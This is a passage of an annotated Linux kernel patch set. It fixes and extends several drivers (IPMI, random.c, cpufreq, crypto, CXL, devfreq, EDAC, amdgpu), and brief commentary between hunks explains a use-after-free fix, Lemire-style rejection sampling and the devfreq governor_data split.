+ 		/* Only ring DB if ring is not empty */
+-		if (tre_ring->base && tre_ring->wp  != tre_ring->rp)
++		if (tre_ring->base && tre_ring->wp  != tre_ring->rp &&
++		    mhi_chan->ch_state == MHI_CH_STATE_ENABLED)
+ 			mhi_ring_chan_db(mhi_cntrl, mhi_chan);
+ 		read_unlock_irq(&mhi_chan->lock);
+ 	}
+diff --git a/drivers/char/ipmi/ipmi_msghandler.c b/drivers/char/ipmi/ipmi_msghandler.c
+index d5ee52be176d3..5d403fb5bd929 100644
+--- a/drivers/char/ipmi/ipmi_msghandler.c
++++ b/drivers/char/ipmi/ipmi_msghandler.c
+@@ -1330,6 +1330,7 @@ static void _ipmi_destroy_user(struct ipmi_user *user)
+ 	unsigned long    flags;
+ 	struct cmd_rcvr  *rcvr;
+ 	struct cmd_rcvr  *rcvrs = NULL;
++	struct module    *owner;
+ 
+ 	if (!acquire_ipmi_user(user, &i)) {
+ 		/*
+@@ -1392,8 +1393,9 @@ static void _ipmi_destroy_user(struct ipmi_user *user)
+ 		kfree(rcvr);
+ 	}
+ 
++	owner = intf->owner;
+ 	kref_put(&intf->refcount, intf_free);
+-	module_put(intf->owner);
++	module_put(owner);
+ }
+ 
+ int ipmi_destroy_user(struct ipmi_user *user)
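
The _ipmi_destroy_user() hunk is a use-after-free fix: kref_put() may drop
the last reference and free intf, after which intf->owner must not be
touched. The general pattern, sketched:

	owner = intf->owner;			/* capture before the put */
	kref_put(&intf->refcount, intf_free);	/* may free intf          */
	module_put(owner);			/* no dereference of intf */
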
+diff --git a/drivers/char/ipmi/ipmi_si_intf.c b/drivers/char/ipmi/ipmi_si_intf.c
+index 6e357ad76f2eb..abddd7e43a9a6 100644
+--- a/drivers/char/ipmi/ipmi_si_intf.c
++++ b/drivers/char/ipmi/ipmi_si_intf.c
+@@ -2153,6 +2153,20 @@ skip_fallback_noirq:
+ }
+ module_init(init_ipmi_si);
+ 
++static void wait_msg_processed(struct smi_info *smi_info)
++{
++	unsigned long jiffies_now;
++	long time_diff;
++
++	while (smi_info->curr_msg || (smi_info->si_state != SI_NORMAL)) {
++		jiffies_now = jiffies;
++		time_diff = (((long)jiffies_now - (long)smi_info->last_timeout_jiffies)
++		     * SI_USEC_PER_JIFFY);
++		smi_event_handler(smi_info, time_diff);
++		schedule_timeout_uninterruptible(1);
++	}
++}
++
+ static void shutdown_smi(void *send_info)
+ {
+ 	struct smi_info *smi_info = send_info;
+@@ -2187,16 +2201,13 @@ static void shutdown_smi(void *send_info)
+ 	 * in the BMC.  Note that timers and CPU interrupts are off,
+ 	 * so no need for locks.
+ 	 */
+-	while (smi_info->curr_msg || (smi_info->si_state != SI_NORMAL)) {
+-		poll(smi_info);
+-		schedule_timeout_uninterruptible(1);
+-	}
++	wait_msg_processed(smi_info);
++
+ 	if (smi_info->handlers)
+ 		disable_si_irq(smi_info);
+-	while (smi_info->curr_msg || (smi_info->si_state != SI_NORMAL)) {
+-		poll(smi_info);
+-		schedule_timeout_uninterruptible(1);
+-	}
++
++	wait_msg_processed(smi_info);
++
+ 	if (smi_info->handlers)
+ 		smi_info->handlers->cleanup(smi_info->si_sm);
+ 
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index 69754155300ea..f5868dddbb618 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -160,6 +160,9 @@ EXPORT_SYMBOL(wait_for_random_bytes);
+  *	u8 get_random_u8()
+  *	u16 get_random_u16()
+  *	u32 get_random_u32()
++ *	u32 get_random_u32_below(u32 ceil)
++ *	u32 get_random_u32_above(u32 floor)
++ *	u32 get_random_u32_inclusive(u32 floor, u32 ceil)
+  *	u64 get_random_u64()
+  *	unsigned long get_random_long()
+  *
+@@ -510,6 +513,41 @@ DEFINE_BATCHED_ENTROPY(u16)
+ DEFINE_BATCHED_ENTROPY(u32)
+ DEFINE_BATCHED_ENTROPY(u64)
+ 
++u32 __get_random_u32_below(u32 ceil)
++{
++	/*
++	 * This is the slow path for variable ceil. It is still fast, most of
++	 * the time, by doing traditional reciprocal multiplication and
++	 * opportunistically comparing the lower half to ceil itself, before
++	 * falling back to computing a larger bound, and then rejecting samples
++	 * whose lower half would indicate a range indivisible by ceil. The use
++	 * of `-ceil % ceil` is analogous to `2^32 % ceil`, but is computable
++	 * in 32-bits.
++	 */
++	u32 rand = get_random_u32();
++	u64 mult;
++
++	/*
++	 * This function is technically undefined for ceil == 0, and in fact
++	 * for the non-underscored constant version in the header, we build bug
++	 * on that. But for the non-constant case, it's convenient to have that
++	 * evaluate to being a straight call to get_random_u32(), so that
++	 * get_random_u32_inclusive() can work over its whole range without
++	 * undefined behavior.
++	 */
++	if (unlikely(!ceil))
++		return rand;
++
++	mult = (u64)ceil * rand;
++	if (unlikely((u32)mult < ceil)) {
++		u32 bound = -ceil % ceil;
++		while (unlikely((u32)mult < bound))
++			mult = (u64)ceil * get_random_u32();
++	}
++	return mult >> 32;
++}
++EXPORT_SYMBOL(__get_random_u32_below);
++
+ #ifdef CONFIG_SMP
+ /*
+  * This function is called when the CPU is coming up, with entry
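
The rejection sampling in __get_random_u32_below() (widely known as
Lemire's method) is easier to follow outside the kernel. A hedged userspace
sketch, assuming rand32() returns uniform 32-bit values:

	#include <stdint.h>

	uint32_t random_below(uint32_t ceil, uint32_t (*rand32)(void))
	{
		uint64_t mult = (uint64_t)ceil * rand32();

		if ((uint32_t)mult < ceil) {		/* low half may be biased */
			uint32_t bound = -ceil % ceil;	/* == 2^32 % ceil         */
			while ((uint32_t)mult < bound)
				mult = (uint64_t)ceil * rand32();
		}
		return mult >> 32;			/* uniform in [0, ceil)   */
	}

For ceil == 6, bound == 4, so a resample is needed only when the low half
lands in the 4-value biased window, roughly a 1-in-2^30 event.
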
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 69b3d61852ac6..7e56a42750ea5 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1207,6 +1207,7 @@ static struct cpufreq_policy *cpufreq_policy_alloc(unsigned int cpu)
+ 	if (!zalloc_cpumask_var(&policy->real_cpus, GFP_KERNEL))
+ 		goto err_free_rcpumask;
+ 
++	init_completion(&policy->kobj_unregister);
+ 	ret = kobject_init_and_add(&policy->kobj, &ktype_cpufreq,
+ 				   cpufreq_global_kobject, "policy%u", cpu);
+ 	if (ret) {
+@@ -1245,7 +1246,6 @@ static struct cpufreq_policy *cpufreq_policy_alloc(unsigned int cpu)
+ 	init_rwsem(&policy->rwsem);
+ 	spin_lock_init(&policy->transition_lock);
+ 	init_waitqueue_head(&policy->transition_wait);
+-	init_completion(&policy->kobj_unregister);
+ 	INIT_WORK(&policy->update, handle_update);
+ 
+ 	policy->cpu = cpu;
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index c30b5a39c2ac2..4a618d80e106f 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -790,8 +790,8 @@ config CRYPTO_DEV_CCREE
+ 	select CRYPTO_ECB
+ 	select CRYPTO_CTR
+ 	select CRYPTO_XTS
+-	select CRYPTO_SM4
+-	select CRYPTO_SM3
++	select CRYPTO_SM4_GENERIC
++	select CRYPTO_SM3_GENERIC
+ 	help
+ 	  Say 'Y' to enable a driver for the REE interface of the Arm
+ 	  TrustZone CryptoCell family of processors. Currently the
+diff --git a/drivers/crypto/ccp/sp-pci.c b/drivers/crypto/ccp/sp-pci.c
+index 792d6da7f0c07..084d052fddccb 100644
+--- a/drivers/crypto/ccp/sp-pci.c
++++ b/drivers/crypto/ccp/sp-pci.c
+@@ -381,6 +381,15 @@ static const struct psp_vdata pspv3 = {
+ 	.inten_reg		= 0x10690,
+ 	.intsts_reg		= 0x10694,
+ };
++
++static const struct psp_vdata pspv4 = {
++	.sev			= &sevv2,
++	.tee			= &teev1,
++	.feature_reg		= 0x109fc,
++	.inten_reg		= 0x10690,
++	.intsts_reg		= 0x10694,
++};
++
+ #endif
+ 
+ static const struct sp_dev_vdata dev_vdata[] = {
+@@ -426,7 +435,7 @@ static const struct sp_dev_vdata dev_vdata[] = {
+ 	{	/* 5 */
+ 		.bar = 2,
+ #ifdef CONFIG_CRYPTO_DEV_SP_PSP
+-		.psp_vdata = &pspv2,
++		.psp_vdata = &pspv4,
+ #endif
+ 	},
+ 	{	/* 6 */
+diff --git a/drivers/crypto/hisilicon/Kconfig b/drivers/crypto/hisilicon/Kconfig
+index 27e1fa9120639..743ce4fc3158c 100644
+--- a/drivers/crypto/hisilicon/Kconfig
++++ b/drivers/crypto/hisilicon/Kconfig
+@@ -26,7 +26,7 @@ config CRYPTO_DEV_HISI_SEC2
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_SHA256
+ 	select CRYPTO_SHA512
+-	select CRYPTO_SM4
++	select CRYPTO_SM4_GENERIC
+ 	depends on PCI && PCI_MSI
+ 	depends on UACCE || UACCE=n
+ 	depends on ARM64 || (COMPILE_TEST && 64BIT)
+diff --git a/drivers/crypto/n2_core.c b/drivers/crypto/n2_core.c
+index 31e24df18877f..20d0dcd50344b 100644
+--- a/drivers/crypto/n2_core.c
++++ b/drivers/crypto/n2_core.c
+@@ -1229,6 +1229,7 @@ struct n2_hash_tmpl {
+ 	const u8	*hash_init;
+ 	u8		hw_op_hashsz;
+ 	u8		digest_size;
++	u8		statesize;
+ 	u8		block_size;
+ 	u8		auth_type;
+ 	u8		hmac_type;
+@@ -1260,6 +1261,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_HMAC_MD5,
+ 	  .hw_op_hashsz	= MD5_DIGEST_SIZE,
+ 	  .digest_size	= MD5_DIGEST_SIZE,
++	  .statesize	= sizeof(struct md5_state),
+ 	  .block_size	= MD5_HMAC_BLOCK_SIZE },
+ 	{ .name		= "sha1",
+ 	  .hash_zero	= sha1_zero_message_hash,
+@@ -1268,6 +1270,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_HMAC_SHA1,
+ 	  .hw_op_hashsz	= SHA1_DIGEST_SIZE,
+ 	  .digest_size	= SHA1_DIGEST_SIZE,
++	  .statesize	= sizeof(struct sha1_state),
+ 	  .block_size	= SHA1_BLOCK_SIZE },
+ 	{ .name		= "sha256",
+ 	  .hash_zero	= sha256_zero_message_hash,
+@@ -1276,6 +1279,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_HMAC_SHA256,
+ 	  .hw_op_hashsz	= SHA256_DIGEST_SIZE,
+ 	  .digest_size	= SHA256_DIGEST_SIZE,
++	  .statesize	= sizeof(struct sha256_state),
+ 	  .block_size	= SHA256_BLOCK_SIZE },
+ 	{ .name		= "sha224",
+ 	  .hash_zero	= sha224_zero_message_hash,
+@@ -1284,6 +1288,7 @@ static const struct n2_hash_tmpl hash_tmpls[] = {
+ 	  .hmac_type	= AUTH_TYPE_RESERVED,
+ 	  .hw_op_hashsz	= SHA256_DIGEST_SIZE,
+ 	  .digest_size	= SHA224_DIGEST_SIZE,
++	  .statesize	= sizeof(struct sha256_state),
+ 	  .block_size	= SHA224_BLOCK_SIZE },
+ };
+ #define NUM_HASH_TMPLS ARRAY_SIZE(hash_tmpls)
+@@ -1424,6 +1429,7 @@ static int __n2_register_one_ahash(const struct n2_hash_tmpl *tmpl)
+ 
+ 	halg = &ahash->halg;
+ 	halg->digestsize = tmpl->digest_size;
++	halg->statesize = tmpl->statesize;
+ 
+ 	base = &halg->base;
+ 	snprintf(base->cra_name, CRYPTO_MAX_ALG_NAME, "%s", tmpl->name);
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index f9ae5ad284ffb..c4f32c32dfd50 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -1226,7 +1226,7 @@ static int cxl_region_attach(struct cxl_region *cxlr,
+ 		struct cxl_endpoint_decoder *cxled_target;
+ 		struct cxl_memdev *cxlmd_target;
+ 
+-		cxled_target = p->targets[pos];
++		cxled_target = p->targets[i];
+ 		if (!cxled_target)
+ 			continue;
+ 
+@@ -1923,6 +1923,9 @@ static int cxl_region_probe(struct device *dev)
+ 	 */
+ 	up_read(&cxl_region_rwsem);
+ 
++	if (rc)
++		return rc;
++
+ 	switch (cxlr->mode) {
+ 	case CXL_DECODER_PMEM:
+ 		return devm_cxl_add_pmem_region(cxlr);
+diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c
+index 63347a5ae5999..8c5f6f7fca112 100644
+--- a/drivers/devfreq/devfreq.c
++++ b/drivers/devfreq/devfreq.c
+@@ -776,8 +776,7 @@ static void remove_sysfs_files(struct devfreq *devfreq,
+  * @dev:	the device to add devfreq feature.
+  * @profile:	device-specific profile to run devfreq.
+  * @governor_name:	name of the policy to choose frequency.
+- * @data:	private data for the governor. The devfreq framework does not
+- *		touch this value.
++ * @data:	private data passed from the devfreq driver to governors; governors must not modify it.
+  */
+ struct devfreq *devfreq_add_device(struct device *dev,
+ 				   struct devfreq_dev_profile *profile,
+@@ -1011,8 +1010,7 @@ static void devm_devfreq_dev_release(struct device *dev, void *res)
+  * @dev:	the device to add devfreq feature.
+  * @profile:	device-specific profile to run devfreq.
+  * @governor_name:	name of the policy to choose frequency.
+- * @data:	private data for the governor. The devfreq framework does not
+- *		touch this value.
++ * @data:	private data passed from the devfreq driver to governors; governors must not modify it.
+  *
+  * This function automatically manages the memory of the devfreq device using
+  * device resource management and simplifies freeing the memory of the devfreq
+diff --git a/drivers/devfreq/governor_userspace.c b/drivers/devfreq/governor_userspace.c
+index ab9db7adb3ade..d69672ccacc49 100644
+--- a/drivers/devfreq/governor_userspace.c
++++ b/drivers/devfreq/governor_userspace.c
+@@ -21,7 +21,7 @@ struct userspace_data {
+ 
+ static int devfreq_userspace_func(struct devfreq *df, unsigned long *freq)
+ {
+-	struct userspace_data *data = df->data;
++	struct userspace_data *data = df->governor_data;
+ 
+ 	if (data->valid)
+ 		*freq = data->user_frequency;
+@@ -40,7 +40,7 @@ static ssize_t set_freq_store(struct device *dev, struct device_attribute *attr,
+ 	int err = 0;
+ 
+ 	mutex_lock(&devfreq->lock);
+-	data = devfreq->data;
++	data = devfreq->governor_data;
+ 
+ 	sscanf(buf, "%lu", &wanted);
+ 	data->user_frequency = wanted;
+@@ -60,7 +60,7 @@ static ssize_t set_freq_show(struct device *dev,
+ 	int err = 0;
+ 
+ 	mutex_lock(&devfreq->lock);
+-	data = devfreq->data;
++	data = devfreq->governor_data;
+ 
+ 	if (data->valid)
+ 		err = sprintf(buf, "%lu\n", data->user_frequency);
+@@ -91,7 +91,7 @@ static int userspace_init(struct devfreq *devfreq)
+ 		goto out;
+ 	}
+ 	data->valid = false;
+-	devfreq->data = data;
++	devfreq->governor_data = data;
+ 
+ 	err = sysfs_create_group(&devfreq->dev.kobj, &dev_attr_group);
+ out:
+@@ -107,8 +107,8 @@ static void userspace_exit(struct devfreq *devfreq)
+ 	if (devfreq->dev.kobj.sd)
+ 		sysfs_remove_group(&devfreq->dev.kobj, &dev_attr_group);
+ 
+-	kfree(devfreq->data);
+-	devfreq->data = NULL;
++	kfree(devfreq->governor_data);
++	devfreq->governor_data = NULL;
+ }
+ 
+ static int devfreq_userspace_handler(struct devfreq *devfreq,
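
The rename works because struct devfreq now keeps the two pointers apart
(a sketch showing only the two relevant fields, named as in the hunks
above):

	struct devfreq {
		/* ... */
		void	*data;		/* driver-owned, opaque to governors */
		void	*governor_data;	/* owned by the active governor      */
	};

A governor that frees its governor_data can no longer destroy memory the
driver still owns through data, and vice versa.
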
+diff --git a/drivers/edac/edac_mc_sysfs.c b/drivers/edac/edac_mc_sysfs.c
+index 0a638c97702a5..15f63452a9bec 100644
+--- a/drivers/edac/edac_mc_sysfs.c
++++ b/drivers/edac/edac_mc_sysfs.c
+@@ -298,6 +298,14 @@ DEVICE_CHANNEL(ch6_dimm_label, S_IRUGO | S_IWUSR,
+ 	channel_dimm_label_show, channel_dimm_label_store, 6);
+ DEVICE_CHANNEL(ch7_dimm_label, S_IRUGO | S_IWUSR,
+ 	channel_dimm_label_show, channel_dimm_label_store, 7);
++DEVICE_CHANNEL(ch8_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 8);
++DEVICE_CHANNEL(ch9_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 9);
++DEVICE_CHANNEL(ch10_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 10);
++DEVICE_CHANNEL(ch11_dimm_label, S_IRUGO | S_IWUSR,
++	channel_dimm_label_show, channel_dimm_label_store, 11);
+ 
+ /* Total possible dynamic DIMM Label attribute file table */
+ static struct attribute *dynamic_csrow_dimm_attr[] = {
+@@ -309,6 +317,10 @@ static struct attribute *dynamic_csrow_dimm_attr[] = {
+ 	&dev_attr_legacy_ch5_dimm_label.attr.attr,
+ 	&dev_attr_legacy_ch6_dimm_label.attr.attr,
+ 	&dev_attr_legacy_ch7_dimm_label.attr.attr,
++	&dev_attr_legacy_ch8_dimm_label.attr.attr,
++	&dev_attr_legacy_ch9_dimm_label.attr.attr,
++	&dev_attr_legacy_ch10_dimm_label.attr.attr,
++	&dev_attr_legacy_ch11_dimm_label.attr.attr,
+ 	NULL
+ };
+ 
+@@ -329,6 +341,14 @@ DEVICE_CHANNEL(ch6_ce_count, S_IRUGO,
+ 		   channel_ce_count_show, NULL, 6);
+ DEVICE_CHANNEL(ch7_ce_count, S_IRUGO,
+ 		   channel_ce_count_show, NULL, 7);
++DEVICE_CHANNEL(ch8_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 8);
++DEVICE_CHANNEL(ch9_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 9);
++DEVICE_CHANNEL(ch10_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 10);
++DEVICE_CHANNEL(ch11_ce_count, S_IRUGO,
++		   channel_ce_count_show, NULL, 11);
+ 
+ /* Total possible dynamic ce_count attribute file table */
+ static struct attribute *dynamic_csrow_ce_count_attr[] = {
+@@ -340,6 +360,10 @@ static struct attribute *dynamic_csrow_ce_count_attr[] = {
+ 	&dev_attr_legacy_ch5_ce_count.attr.attr,
+ 	&dev_attr_legacy_ch6_ce_count.attr.attr,
+ 	&dev_attr_legacy_ch7_ce_count.attr.attr,
++	&dev_attr_legacy_ch8_ce_count.attr.attr,
++	&dev_attr_legacy_ch9_ce_count.attr.attr,
++	&dev_attr_legacy_ch10_ce_count.attr.attr,
++	&dev_attr_legacy_ch11_ce_count.attr.attr,
+ 	NULL
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 913f22d41673d..0be85d19a6f3e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3005,14 +3005,15 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 			continue;
+ 		}
+ 
+-		/* skip suspend of gfx and psp for S0ix
++		/* skip suspend of gfx/mes and psp for S0ix
+ 		 * gfx is in gfxoff state, so on resume it will exit gfxoff just
+ 		 * like at runtime. PSP is also part of the always on hardware
+ 		 * so no need to suspend it.
+ 		 */
+ 		if (adev->in_s0ix &&
+ 		    (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_PSP ||
+-		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_GFX))
++		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_GFX ||
++		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_MES))
+ 			continue;
+ 
+ 		/* XXX handle errors */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index bf2d50c8c92ad..d8dfbb9b735dc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2040,6 +2040,15 @@ static int amdgpu_pci_probe(struct pci_dev *pdev,
+ 			 "See modparam exp_hw_support\n");
+ 		return -ENODEV;
+ 	}
++	/* differentiate between P10 and P11 asics with the same DID */
++	if (pdev->device == 0x67FF &&
++	    (pdev->revision == 0xE3 ||
++	     pdev->revision == 0xE7 ||
++	     pdev->revision == 0xF3 ||
++	     pdev->revision == 0xF7)) {
++		flags &= ~AMD_ASIC_MASK;
++		flags |= CHIP_POLARIS10;
++	}
+ 
+ 	/* Due to hardware bugs, S/G Display on raven requires a 1:1 IOMMU mapping,
+ 	 * however, SME requires an indirect IOMMU mapping because the encryption
+@@ -2109,12 +2118,12 @@ static int amdgpu_pci_probe(struct pci_dev *pdev,
+ 
+ 	pci_set_drvdata(pdev, ddev);
+ 
+-	ret = amdgpu_driver_load_kms(adev, ent->driver_data);
++	ret = amdgpu_driver_load_kms(adev, flags);
+ 	if (ret)
+ 		goto err_pci;
+ 
+ retry_init:
+-	ret = drm_dev_register(ddev, ent->driver_data);
++	ret = drm_dev_register(ddev, flags);
+ 	if (ret == -EAGAIN && ++retry <= 3) {
+ 		DRM_INFO("retry init %d\n", retry);
+ 		/* Don't request EX mode too frequently which is attacking */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 2e8f6cd7a7293..3df13d841e4d5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1509,7 +1509,8 @@ u64 amdgpu_bo_gpu_offset_no_check(struct amdgpu_bo *bo)
+ uint32_t amdgpu_bo_get_preferred_domain(struct amdgpu_device *adev,
+ 					    uint32_t domain)
+ {
+-	if (domain == (AMDGPU_GEM_DOMAIN_VRAM | AMDGPU_GEM_DOMAIN_GTT)) {
++	if ((domain == (AMDGPU_GEM_DOMAIN_VRAM | AMDGPU_GEM_DOMAIN_GTT)) &&
++	    ((adev->asic_type == CHIP_CARRIZO) || (adev->asic_type == CHIP_STONEY))) {
+ 		domain = AMDGPU_GEM_DOMAIN_VRAM;
+ 		if (adev->gmc.real_vram_size <= AMDGPU_SG_THRESHOLD)
+ 			domain = AMDGPU_GEM_DOMAIN_GTT;
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index f141fadd2d86f..725876b4f02ed 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -1339,7 +1339,8 @@ static int mes_v11_0_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	if (!amdgpu_in_reset(adev) &&
++	/* it's only intended for use in mes_self_test case, not for s0ix and reset */
++	if (!amdgpu_in_reset(adev) && !adev->in_s0ix &&
+ 	    (adev->ip_versions[GC_HWIP][0] != IP_VERSION(11, 0, 3)))
+ 		amdgpu_mes_self_test(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c
+index 998b5d17b271b..0e664d0cc8d51 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_0.c
+@@ -319,7 +319,7 @@ static void mmhub_v2_0_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = mmMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, mmMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, mmMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v2_0_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c
+index 1b027d069ab40..4638ea7c2eec5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v2_3.c
+@@ -243,7 +243,7 @@ static void mmhub_v2_3_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = mmMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, mmMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, mmMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v2_3_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c
+index a1d26c4d80b8c..16cc82215e2e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0.c
+@@ -275,7 +275,7 @@ static void mmhub_v3_0_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = regMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, regMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, regMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v3_0_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c
+index e8058edc1d108..6bdf2ef0298d6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_1.c
+@@ -269,7 +269,7 @@ static void mmhub_v3_0_1_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = regMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, regMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, regMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v3_0_1_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c
+index 770be0a8f7ce7..45465acaa943a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/mmhub_v3_0_2.c
+@@ -268,7 +268,7 @@ static void mmhub_v3_0_2_init_cache_regs(struct amdgpu_device *adev)
+ 
+ 	tmp = regMMVM_L2_CNTL5_DEFAULT;
+ 	tmp = REG_SET_FIELD(tmp, MMVM_L2_CNTL5, L2_CACHE_SMALLK_FRAGMENT_SIZE, 0);
+-	WREG32_SOC15(GC, 0, regMMVM_L2_CNTL5, tmp);
++	WREG32_SOC15(MMHUB, 0, regMMVM_L2_CNTL5, tmp);
+ }
+ 
+ static void mmhub_v3_0_2_enable_system_domain(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 512c32327eb11..c2c26fbea5129 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1512,6 +1512,7 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		case IP_VERSION(3, 0, 1):
+ 		case IP_VERSION(3, 1, 2):
+ 		case IP_VERSION(3, 1, 3):
++		case IP_VERSION(3, 1, 4):
+ 		case IP_VERSION(3, 1, 5):
+ 		case IP_VERSION(3, 1, 6):
+ 			init_data.flags.gpu_vm_support = true;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+index b76f0f7e42998..d6b964cf73bd1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+@@ -522,9 +522,9 @@ typedef enum  {
+   TEMP_HOTSPOT_M,
+   TEMP_MEM,
+   TEMP_VR_GFX,
++  TEMP_VR_SOC,
+   TEMP_VR_MEM0,
+   TEMP_VR_MEM1,
+-  TEMP_VR_SOC,
+   TEMP_VR_U,
+   TEMP_LIQUID0,
+   TEMP_LIQUID1,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index 865d6358918d2..a9122b3b15322 100644
